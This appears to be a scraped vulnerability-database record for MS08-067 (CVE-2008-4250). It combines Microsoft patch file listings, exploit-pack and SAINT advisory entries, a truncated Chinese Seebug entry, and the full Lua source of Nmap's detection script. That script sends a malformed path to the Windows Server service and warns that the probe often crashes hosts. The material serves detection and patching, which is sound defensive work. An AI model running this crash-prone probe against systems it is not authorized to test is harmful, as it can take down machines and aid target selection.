class=\"sbody-td\">1,035</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c6137e8d07b2393d.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,402</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:34</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68eda12d50435af6.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,188</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:53</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,040</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,040</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,827</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,827</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,468</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,468</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,469</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,469</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,472</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,472</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,460</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,460</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,401</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">18-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:13</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,187</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">21-Oct-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">08:25</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div></div></body></html>", "modified": "2018-04-17T19:02:46", "id": "KB958644", "href": "https://support.microsoft.com/en-us/help/958644/", "published": "2018-04-17T07:40:33", "title": "MS08-067: Vulnerability in Server service could allow remote code execution", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T17:19:20", "bulletinFamily": "exploit", "description": "**Name**| ms08_067 \n---|--- \n**CVE**| CVE-2008-4250 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Windows Server Service Underflow (MS08-067) \n**Notes**| References: http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx \nCVE Name: CVE-2008-4250 \nVENDOR: Microsoft \nNotes: If you need some localized version of Windows XP or 2003 added to the list, send support@immunityinc.com a msvcrt.dll of this version! \nRepeatability: Infinite \nMSADV: MS08-067 \nCVS URL: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 \nDate public: 10/23/2008 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 \nCVSS: 10.0 \n\n", "modified": "2008-10-23T22:00:00", "published": "2008-10-23T22:00:00", "id": "MS08_067", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms08_067", "title": "Immunity Canvas: MS08_067", "type": "canvas", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nmap": [{"lastseen": "2019-07-03T17:06:02", "bulletinFamily": "scanner", "description": "Detects Microsoft Windows systems vulnerable to the remote code execution vulnerability known as MS08-067. This check is dangerous and it may crash systems. \n\nOn a fairly wide scan conducted by Brandon Enright, we determined that on average, a vulnerable system is more likely to crash than to survive the check. Out of 82 vulnerable systems, 52 crashed. Please consider this before running the script. \n\nThis check was previously part of smb-check-vulns.nse.\n\n## Script Arguments \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap --script smb-vuln-ms08-067.nse -p445 <host>\n nmap -sU --script smb-vuln-ms08-067.nse -p U:137 <host>\n \n\n## Script Output \n \n \n | smb-vuln-ms08-067:\n | VULNERABLE:\n | Microsoft Windows system vulnerable to remote code execution (MS08-067)\n | State: VULNERABLE\n | IDs: CVE:CVE-2008-4250\n | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,\n | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary\n | code via a crafted RPC request that triggers the overflow during path canonicalization.\n |\n | Disclosure date: 2008-10-23\n | References:\n | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx\n |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250\n \n\n## Requires \n\n * msrpc\n * smb\n * string\n * vulns\n\n* * *\n", "modified": "2019-06-27T19:13:41", "published": "2015-10-03T06:07:49", "id": "NMAP:SMB-VULN-MS08-067.NSE", "href": "https://nmap.org/nsedoc/scripts/smb-vuln-ms08-067.html", "title": "smb-vuln-ms08-067 NSE Script", "type": "nmap", "sourceData": "local msrpc = require \"msrpc\"\nlocal smb = require \"smb\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nDetects Microsoft Windows systems vulnerable to the remote code execution vulnerability\nknown as MS08-067. This check is dangerous and it may crash systems.\n\nOn a fairly wide scan conducted by Brandon Enright, we determined\nthat on average, a vulnerable system is more likely to crash than to survive\nthe check. Out of 82 vulnerable systems, 52 crashed.\nPlease consider this before running the script.\n\nThis check was previously part of smb-check-vulns.nse.\n]]\n---\n--@usage\n-- nmap --script smb-vuln-ms08-067.nse -p445 <host>\n-- nmap -sU --script smb-vuln-ms08-067.nse -p U:137 <host>\n--\n--@output\n--| smb-vuln-ms08-067:\n--| VULNERABLE:\n--| Microsoft Windows system vulnerable to remote code execution (MS08-067)\n--| State: VULNERABLE\n--| IDs: CVE:CVE-2008-4250\n--| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,\n--| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary\n--| code via a crafted RPC request that triggers the overflow during path canonicalization.\n--|\n--| Disclosure date: 2008-10-23\n--| References:\n--| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx\n--|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250\n---\n\nauthor = {\"Ron Bowes\", \"Jiayi Ye\", \"Paulino Calderon <calderon()websec.mx>\"}\ncopyright = \"Ron Bowes\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\",\"exploit\",\"dos\",\"vuln\"}\n-- run after all smb-* scripts (so if it DOES crash something, it doesn't kill\n-- other scans have had a chance to run)\ndependencies = {\n \"smb-brute\", \"smb-enum-sessions\", \"smb-security-mode\",\n \"smb-enum-shares\", \"smb-server-stats\",\n \"smb-enum-domains\", \"smb-enum-users\", \"smb-system-info\",\n \"smb-enum-groups\", \"smb-os-discovery\", \"smb-enum-processes\",\n \"smb-psexec\",\n};\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\nlocal VULNERABLE = 1\nlocal PATCHED = 2\nlocal UNKNOWN = 3\nlocal NOTRUN = 4\nlocal INFECTED = 5\n\n---Check if the server is patched for MS08-067. This is done by calling NetPathCompare with an\n-- illegal string. If the string is accepted, then the server is vulnerable; if it's rejected, then\n-- you're safe (for now).\n--\n-- Based on a packet cap of this script, thanks go out to the author:\n-- http://labs.portcullis.co.uk/application/ms08-067-check/\n--\n-- NOTE: This CAN crash stuff (ie, crash svchost and force a reboot), so beware! In about 20\n-- tests I did, it crashed once. This is not a guarantee.\n--\n--@param host The host object.\n--@return (status, result) If status is false, result is an error code; otherwise, result is either\n-- <code>VULNERABLE</code> for vulnerable, <code>PATCHED</code> for not vulnerable,\n-- <code>UNKNOWN</code> if there was an error (likely vulnerable),\n-- and <code>INFECTED</code> if it was patched by Conficker.\nfunction check_ms08_067(host)\n local status, smbstate\n local bind_result, netpathcompare_result\n\n -- Create the SMB session\n status, smbstate = msrpc.start_smb(host, \"\\\\\\\\BROWSER\")\n if(status == false) then\n return false, smbstate\n end\n\n -- Bind to SRVSVC service\n status, bind_result = msrpc.bind(smbstate, msrpc.SRVSVC_UUID, msrpc.SRVSVC_VERSION, nil)\n if(status == false) then\n msrpc.stop_smb(smbstate)\n return false, bind_result\n end\n\n -- Call netpathcanonicalize\n -- status, netpathcanonicalize_result = msrpc.srvsvc_netpathcanonicalize(smbstate, host.ip, \"\\\\a\", \"\\\\test\\\\\")\n\n local path1 = \"\\\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\\..\\\\n\"\n local path2 = \"\\\\n\"\n status, netpathcompare_result = msrpc.srvsvc_netpathcompare(smbstate, host.ip, path1, path2, 1, 0)\n\n -- Stop the SMB session\n msrpc.stop_smb(smbstate)\n\n if(status == false) then\n if(string.find(netpathcompare_result, \"WERR_INVALID_PARAMETER\") ~= nil) then\n return true, INFECTED\n elseif(string.find(netpathcompare_result, \"INVALID_NAME\") ~= nil) then\n return true, PATCHED\n else\n return true, UNKNOWN, netpathcompare_result\n end\n end\n\n return true, VULNERABLE\nend\n\naction = function(host)\n local status, result, message\n local response = {}\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host)\n local vuln_table = {\n title = 'Microsoft Windows system vulnerable to remote code execution (MS08-067)',\n state = vulns.STATE.NOT_VULN,\n description = [[\n The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,\n Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary\n code via a crafted RPC request that triggers the overflow during path canonicalization.\n ]],\n IDS = {CVE = 'CVE-2008-4250'},\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms08-067.aspx'\n },\n dates = {\n disclosure = {year = '2008', month = '10', day = '23'},\n }\n }\n -- Check for ms08-067\n status, result, message = check_ms08_067(host)\n if(status == false) then\n vuln_table.state = vulns.STATE.NOT_VULN\n else\n if(result == VULNERABLE) then\n vuln_table.state = vulns.STATE.VULN\n elseif(result == UNKNOWN) then\n vuln_table.state = vulns.STATE.LIKELY_VULN\n elseif(result == INFECTED) then\n vuln_table.exploit_results = \"This system has been infected by the Conficker worm.\"\n vuln_table.state = vulns.STATE.LIKELY_VULN\n else\n vuln_table.state = vulns.STATE.NOT_VULN\n end\n end\n return vuln_report:make_output(vuln_table)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:33", "bulletinFamily": "exploit", "description": "Added: 10/24/2008 \nCVE: [CVE-2008-4250](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250>) \nBID: [31874](<http://www.securityfocus.com/bid/31874>) \nOSVDB: [49243](<http://www.osvdb.org/49243>) \n\n\n### Background\n\nThe Windows Server service supports file, print, and named-pipe sharing over the network. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending a specially crafted RPC request to the Windows Server service. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 08-067](<http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx> \n\n\n### Limitations\n\nDue to the nature of this vulnerability, the success of the exploit depends on the contents of unused stack memory space, and therefore is not completely reliable. \n\n### Platforms\n\nWindows XP SP3 / Windows XP \nWindows XP SP2 \nWindows XP SP1 / Windows XP \nWindows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP2 \n \n\n", "modified": "2008-10-24T00:00:00", "published": "2008-10-24T00:00:00", "id": "SAINT:03200E9666F9133B812B3104462F5E6E", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_server_service_ms08067", "title": "Windows Server Service buffer overflow MS08-067", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:56", "bulletinFamily": "exploit", "description": "Added: 10/24/2008 \nCVE: [CVE-2008-4250](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250>) \nBID: [31874](<http://www.securityfocus.com/bid/31874>) \nOSVDB: [49243](<http://www.osvdb.org/49243>) \n\n\n### Background\n\nThe Windows Server service supports file, print, and named-pipe sharing over the network. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending a specially crafted RPC request to the Windows Server service. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 08-067](<http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx> \n\n\n### Limitations\n\nDue to the nature of this vulnerability, the success of the exploit depends on the contents of unused stack memory space, and therefore is not completely reliable. \n\n### Platforms\n\nWindows XP SP3 / Windows XP \nWindows XP SP2 \nWindows XP SP1 / Windows XP \nWindows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP2 \n \n\n", "modified": "2008-10-24T00:00:00", "published": "2008-10-24T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_server_service_ms08067", "id": "SAINT:AC0D0F2C31B3A560B890C66CD6245812", "title": "Windows Server Service buffer overflow MS08-067", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T21:23:42", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 31874\r\nCVE(CAN) ID: CVE-2008-4250\r\n\r\nMicrosoft Windows\u662f\u5fae\u8f6f\u53d1\u5e03\u7684\u975e\u5e38\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nWindows\u7684Server\u670d\u52a1\u5728\u5904\u7406\u7279\u5236RPC\u8bf7\u6c42\u65f6\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u53d1\u9001\u6076\u610f\u7684RPC\u8bf7\u6c42\u89e6\u53d1\u8fd9\u4e2a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u5b8c\u5168\u5165\u4fb5\u7528\u6237\u7cfb\u7edf\uff0c\u4ee5SYSTEM\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\r\n\u5bf9\u4e8eWindows 2000\u3001XP\u548cServer 2003\uff0c\u65e0\u9700\u8ba4\u8bc1\u4fbf\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff1b\u5bf9\u4e8eWindows Vista\u548cServer 2008\uff0c\u53ef\u80fd\u9700\u8981\u8fdb\u884c\u8ba4\u8bc1\u3002\r\n\r\n\u76ee\u524d\u8fd9\u4e2a\u6f0f\u6d1e\u6b63\u5728\u88ab\u540d\u4e3aTrojanSpy:Win32/Gimmiv.A\u548cTrojanSpy:Win32/Gimmiv.A.dll\u7684\u6728\u9a6c\u79ef\u6781\u7684\u5229\u7528\u3002\r\n\r\nMicrosoft Windows XP SP3\r\nMicrosoft 